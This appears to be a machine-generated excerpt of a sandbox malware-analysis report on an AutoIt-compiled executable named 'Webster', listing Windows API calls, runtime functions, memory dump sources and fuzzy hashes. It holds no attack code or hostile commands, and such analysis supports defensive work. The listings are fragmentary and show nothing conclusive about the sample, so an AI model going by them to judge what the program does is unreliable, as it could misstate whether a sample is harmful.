                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A9512A
                                                                                  • ShowWindow.USER32(00000000), ref: 00A9513E
                                                                                  • ShowWindow.USER32(00000000), ref: 00A95147
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Similarity
                                                                                  • API ID: Window$CreateShow
                                                                                  • String ID: AutoIt v3$edit
                                                                                  APIs
                                                                                    • Part of subcall function 00A94A8C: _fseek.LIBCMT ref: 00A94AA4
                                                                                    • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DE1
                                                                                    • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DF4
                                                                                  • _free.LIBCMT ref: 00AE9C5F
                                                                                  • _free.LIBCMT ref: 00AE9C66
                                                                                  • _free.LIBCMT ref: 00AE9CD1
                                                                                    • Part of subcall function 00AA2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2F99
                                                                                    • Part of subcall function 00AA2F85: GetLastError.KERNEL32(00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2FAB
                                                                                  • _free.LIBCMT ref: 00AE9CD9
                                                                                  Similarity
                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                  Similarity
                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A8534A
                                                                                  • TranslateMessage.USER32(?), ref: 00A85356
                                                                                  • DispatchMessageW.USER32(?), ref: 00A85360
                                                                                  Similarity
                                                                                  • API ID: Message$Peek$DispatchTranslate
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812A8
                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812C9
                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812EB
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: Control Panel\Mouse
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00A95B58
                                                                                    • Part of subcall function 00A956F8: _memset.LIBCMT ref: 00A95787
                                                                                    • Part of subcall function 00A956F8: _wcscpy.LIBCMT ref: 00A957DB
                                                                                    • Part of subcall function 00A956F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A957EB
                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00A95BAD
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A95BBC
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AD0D7C
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                  APIs
                                                                                    • Part of subcall function 00A949C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A927AF,?,00000001), ref: 00A949F4
                                                                                  • _free.LIBCMT ref: 00ACFB04
                                                                                  • _free.LIBCMT ref: 00ACFB4B
                                                                                    • Part of subcall function 00A929BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A92ADF
                                                                                  Strings
                                                                                  • Bad directive syntax error, xrefs: 00ACFB33
                                                                                  Similarity
                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                  • String ID: Bad directive syntax error
                                                                                  APIs
                                                                                    • Part of subcall function 00A94AB2: __fread_nolock.LIBCMT ref: 00A94AD0
                                                                                  • _wcscmp.LIBCMT ref: 00AE9DE1
                                                                                  • _wcscmp.LIBCMT ref: 00AE9DF4
                                                                                  Similarity
                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                  • String ID: FILE
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AD032B
                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00AD0375
                                                                                    • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                                                    • Part of subcall function 00AA09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AA09E4
                                                                                  Similarity
                                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                                  • String ID: X
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  APIs
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA07EC
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA07F4
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA07FF
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA080A
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA0812
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA081A
                                                                                    • Part of subcall function 00A9FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A8AC6B), ref: 00A9FFA7
                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A8AD08
                                                                                  • OleInitialize.OLE32(00000000), ref: 00A8AD85
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AC2F56
                                                                                  Similarity
                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1986988660-0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00A959F9
                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A95A9E
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A95ABB
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_$_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1505330794-0
                                                                                  APIs
                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00AA5953
                                                                                    • Part of subcall function 00AAA39B: __NMSG_WRITE.LIBCMT ref: 00AAA3C2
                                                                                    • Part of subcall function 00AAA39B: __NMSG_WRITE.LIBCMT ref: 00AAA3CC
                                                                                  • __NMSG_WRITE.LIBCMT ref: 00AA595A
                                                                                    • Part of subcall function 00AAA3F8: GetModuleFileNameW.KERNEL32(00000000,00B453BA,00000104,00000004,00000001,00AA1003), ref: 00AAA48A
                                                                                    • Part of subcall function 00AAA3F8: ___crtMessageBoxW.LIBCMT ref: 00AAA538
                                                                                    • Part of subcall function 00AA32CF: ___crtCorExitProcess.LIBCMT ref: 00AA32D5
                                                                                    • Part of subcall function 00AA32CF: ExitProcess.KERNEL32 ref: 00AA32DE
                                                                                    • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                                                  • RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F
                                                                                  Similarity
                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1372826849-0
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00AE92D6
                                                                                    • Part of subcall function 00AA2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2F99
                                                                                    • Part of subcall function 00AA2F85: GetLastError.KERNEL32(00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2FAB
                                                                                  • _free.LIBCMT ref: 00AE92E7
                                                                                  • _free.LIBCMT ref: 00AE92F9
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CALL
                                                                                  • API String ID: 0-4196123274
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: EA06
                                                                                  • API String ID: 4104443479-3962188686
                                                                                  APIs
                                                                                  • _memmove.LIBCMT ref: 00AE68EC
                                                                                  • _memmove.LIBCMT ref: 00AE690A
                                                                                    • Part of subcall function 00AE6A73: _memmove.LIBCMT ref: 00AE6B01
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00AE614E
                                                                                  Similarity
                                                                                  • API ID: BuffCharLower
                                                                                  • String ID:
                                                                                  • API String ID: 2358735015-0
                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 00AA0ED5
                                                                                  • LoadLibraryExW.KERNELBASE ref: 00AA0EE7
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindLibraryLoadNotification
                                                                                  • String ID:
                                                                                  • API String ID: 1525634188-0
                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction ID: faf0e8abd85e8a6ad99b83854a581be77d23f9226f929786359fd89049be1482
                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction Fuzzy Hash: B031C571A00109DFDB28DF58C480969FBB6FF5A300B648AA5E409DB291E731EDC1DBC0
                                                                                  APIs
                                                                                  • IsThemeActive.UXTHEME ref: 00A95FEF
                                                                                    • Part of subcall function 00AA359C: __lock.LIBCMT ref: 00AA35A2
                                                                                    • Part of subcall function 00AA359C: DecodePointer.KERNEL32(00000001,?,00A96004,00AD8892), ref: 00AA35AE
                                                                                    • Part of subcall function 00AA359C: EncodePointer.KERNEL32(?,?,00A96004,00AD8892), ref: 00AA35B9
                                                                                    • Part of subcall function 00A95F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A95F18
                                                                                    • Part of subcall function 00A95F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A95F2D
                                                                                    • Part of subcall function 00A95240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A9526C
                                                                                    • Part of subcall function 00A95240: IsDebuggerPresent.KERNEL32 ref: 00A9527E
                                                                                    • Part of subcall function 00A95240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00A952E6
                                                                                    • Part of subcall function 00A95240: SetCurrentDirectoryW.KERNEL32(?), ref: 00A95366
                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A9602F
                                                                                  Similarity
                                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                  • String ID:
                                                                                  • API String ID: 1438897964-0
                                                                                  • Opcode ID: 95b4ed0e87b1f3f4ea78951d903415ee9dd0b63a5310bdd6718c992230dca05b
                                                                                  • Instruction ID: 98b4262840d1a1a71c66b6c879fbe8d72cd1dc63fcaad8cb08865a88c9542512
                                                                                  • Opcode Fuzzy Hash: 95b4ed0e87b1f3f4ea78951d903415ee9dd0b63a5310bdd6718c992230dca05b
                                                                                  • Instruction Fuzzy Hash: 99115E759083029BC711EF69ED4594ABBE8FF9A750F00891EF485872A1DFB09A44CF92
                                                                                  APIs
                                                                                    • Part of subcall function 00AA593C: __FF_MSGBANNER.LIBCMT ref: 00AA5953
                                                                                    • Part of subcall function 00AA593C: __NMSG_WRITE.LIBCMT ref: 00AA595A
                                                                                    • Part of subcall function 00AA593C: RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F
                                                                                  • std::exception::exception.LIBCMT ref: 00AA101C
                                                                                  • __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                    • Part of subcall function 00AA87CB: RaiseException.KERNEL32(?,?,?,00B3CAF8,?,?,?,?,?,00AA1036,?,00B3CAF8,?,00000001), ref: 00AA8820
                                                                                  Similarity
                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 3902256705-0
                                                                                  • Opcode ID: 008d50e0b8a39efd63f3edc43d1f8c1d0be25af7841c343e41b2237b9a6f9c03
                                                                                  • Instruction ID: c29012550bc96f7a9a38a9381752da7bd97df58876ccca8df5265c61e2648757
                                                                                  • Opcode Fuzzy Hash: 008d50e0b8a39efd63f3edc43d1f8c1d0be25af7841c343e41b2237b9a6f9c03
                                                                                  • Instruction Fuzzy Hash: 02F0A47650421DB6CB21ABA8ED159DE7BFC9F02760F50446AF814A72D1EFB18BC0C2A4
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: __lock_file_memset
                                                                                  • String ID:
                                                                                  • API String ID: 26237723-0
                                                                                  • Opcode ID: 70dfe4c7473eb6f941a97d5a7ab449bfac797b3aee8241ce1b8663f59600b234
                                                                                  • Instruction ID: bc1658cc3be21eae7208c755f9325cfd17512aa16dbe5b73a5d040d64805d1c8
                                                                                  • Opcode Fuzzy Hash: 70dfe4c7473eb6f941a97d5a7ab449bfac797b3aee8241ce1b8663f59600b234
                                                                                  • Instruction Fuzzy Hash: 52018471C00649EBCF11AF79CD0189EBB61AF86760F184115F8242B1E1DB398A21EF91
                                                                                  APIs
                                                                                    • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                                                  • __lock_file.LIBCMT ref: 00AA560B
                                                                                    • Part of subcall function 00AA6E3E: __lock.LIBCMT ref: 00AA6E61
                                                                                  • __fclose_nolock.LIBCMT ref: 00AA5616
                                                                                  Similarity
                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2800547568-0
                                                                                  • Opcode ID: 1559d60b89368231b1f167067845b44ac7732f80a039728024bd7af6bc5c5cd5
                                                                                  • Instruction ID: c9fc389840311a78ed505a40683ff5d8f5689c9438f09ff3bfa0b0871f83fa58
                                                                                  • Opcode Fuzzy Hash: 1559d60b89368231b1f167067845b44ac7732f80a039728024bd7af6bc5c5cd5
                                                                                  • Instruction Fuzzy Hash: 3EF0B471C02B069BD720ABB9890276E77E16F43330F258209E424AB1C1CB7C89019F59
                                                                                  APIs
                                                                                  • __lock_file.LIBCMT ref: 00AA5EB4
                                                                                  • __ftell_nolock.LIBCMT ref: 00AA5EBF
                                                                                    • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                                                  Similarity
                                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2999321469-0
                                                                                  • Opcode ID: 3c90a370d6cbcc729ba38fafcd6107879483ef48a8ef4db12fd93e80bb08fc82
                                                                                  • Instruction ID: 9aecf0b1ad49fe513e9f7a41f1c062a920d3d06c832813661a3ebde34dad5cc0
                                                                                  • Opcode Fuzzy Hash: 3c90a370d6cbcc729ba38fafcd6107879483ef48a8ef4db12fd93e80bb08fc82
                                                                                  • Instruction Fuzzy Hash: 58F0EC32D11615AAD710BB748A0375E76A0AF03331F254206F420BB1D1CF7C4E019B55
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00A95AEF
                                                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A95B1F
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell__memset
                                                                                  • String ID:
                                                                                  • API String ID: 928536360-0
                                                                                  • Opcode ID: 694697a6c3d17b0e7a6ef95d7899acee3584f3a1a6df0a51205c5de1da759938
                                                                                  • Instruction ID: ed71b5cb0920d247f3d03c68132a106e2b62406637a71e046cdeb89200d2d2c4
                                                                                  • Opcode Fuzzy Hash: 694697a6c3d17b0e7a6ef95d7899acee3584f3a1a6df0a51205c5de1da759938
                                                                                  • Instruction Fuzzy Hash: 41F0A7719583089FDB929B24DC467D577BCA702308F0002E9FA4897292DFB14B88CF55
                                                                                  Similarity
                                                                                  • API ID: LoadString$__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 207118244-0
                                                                                  • Opcode ID: db3f5d81911007e7f9a6e791eb5f62d3513149e1a416f57eff6ecf9f777dd70f
                                                                                  • Instruction ID: 3b9ba3c465c9c05c0118d15915e4c254869507d370f5465be5e3cdd39b967efd
                                                                                  • Opcode Fuzzy Hash: db3f5d81911007e7f9a6e791eb5f62d3513149e1a416f57eff6ecf9f777dd70f
                                                                                  • Instruction Fuzzy Hash: 98B13C35A0010E9FCF14EF95C9919FEB7B5FF58760F10811AFA15AB291EB70A941CB50
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                  • Instruction ID: 117f5b2822fdb5acf41958aa9a69d4b4470de0e3b310a77d8d7cc56a50924cdf
                                                                                  • Opcode Fuzzy Hash: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                  • Instruction Fuzzy Hash: A361B9706046069FEB10EF54C981F7AB7F5EF24300F11806EE91A9B291E774ED81CB62
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                  • Instruction ID: 6ca112584d007b714f0a43eb56c3070cc0cc7a7a44cfb937b8873494a96869b6
                                                                                  • Opcode Fuzzy Hash: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                  • Instruction Fuzzy Hash: F5319C7A204A02DFCF249F18D480A25F7F0FF49310B15C569E88A8B791DB30E881CB90
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A94B29: FreeLibrary.KERNEL32(00000000,?), ref: 00A94B63
                                                                                    • Part of subcall function 00AA547B: __wfsopen.LIBCMT ref: 00AA5486
                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A927AF,?,00000001), ref: 00A949F4
                                                                                    • Part of subcall function 00A94ADE: FreeLibrary.KERNEL32(00000000), ref: 00A94B18
                                                                                    • Part of subcall function 00A948B0: _memmove.LIBCMT ref: 00A948FA
                                                                                  Similarity
                                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1396898556-0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  APIs
                                                                                  • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00AF4998
                                                                                  Similarity
                                                                                  • API ID: EnvironmentVariable
                                                                                  • String ID:
                                                                                  • API String ID: 1431749950-0
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                                                    • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                  • _memset.LIBCMT ref: 00AE7CB4
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 525207782-0
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                                                    • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                  • _memmove.LIBCMT ref: 00ABDC8B
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 1602317333-0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _fseek
                                                                                  • String ID:
                                                                                  • API String ID: 2937370855-0
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,?,?,00A927AF,?,00000001), ref: 00A94A63
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock
                                                                                  • String ID:
                                                                                  • API String ID: 2638373210-0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  APIs
                                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AA09E4
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongNamePath_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2514874351-0
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wfsopen
                                                                                  • String ID:
                                                                                  • API String ID: 197181222-0
                                                                                  APIs
                                                                                    • Part of subcall function 00AE4005: FindFirstFileW.KERNEL32(?,?), ref: 00AE407C
                                                                                    • Part of subcall function 00AE4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00AE40CC
                                                                                    • Part of subcall function 00AE4005: FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE40DD
                                                                                    • Part of subcall function 00AE4005: FindClose.KERNEL32(00000000), ref: 00AE40F4
                                                                                  • GetLastError.KERNEL32 ref: 00AEC292
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                  • String ID:
                                                                                  • API String ID: 2191629493-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B0D208
                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B0D249
                                                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B0D28E
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B0D2B8
                                                                                  • SendMessageW.USER32 ref: 00B0D2E1
                                                                                  • _wcsncpy.LIBCMT ref: 00B0D359
                                                                                  • GetKeyState.USER32(00000011), ref: 00B0D37A
                                                                                  • GetKeyState.USER32(00000009), ref: 00B0D387
                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B0D39D
                                                                                  • GetKeyState.USER32(00000010), ref: 00B0D3A7
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B0D3D0
                                                                                  • SendMessageW.USER32 ref: 00B0D3F7
                                                                                  • SendMessageW.USER32(?,00001030,?,00B0B9BA), ref: 00B0D4FD
                                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B0D513
                                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B0D526
                                                                                  • SetCapture.USER32(?), ref: 00B0D52F
                                                                                  • ClientToScreen.USER32(?,?), ref: 00B0D594
                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B0D5A1
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B0D5BB
                                                                                  • ReleaseCapture.USER32 ref: 00B0D5C6
                                                                                  • GetCursorPos.USER32(?), ref: 00B0D600
                                                                                  • ScreenToClient.USER32(?,?), ref: 00B0D60D
                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B0D669
                                                                                  • SendMessageW.USER32 ref: 00B0D697
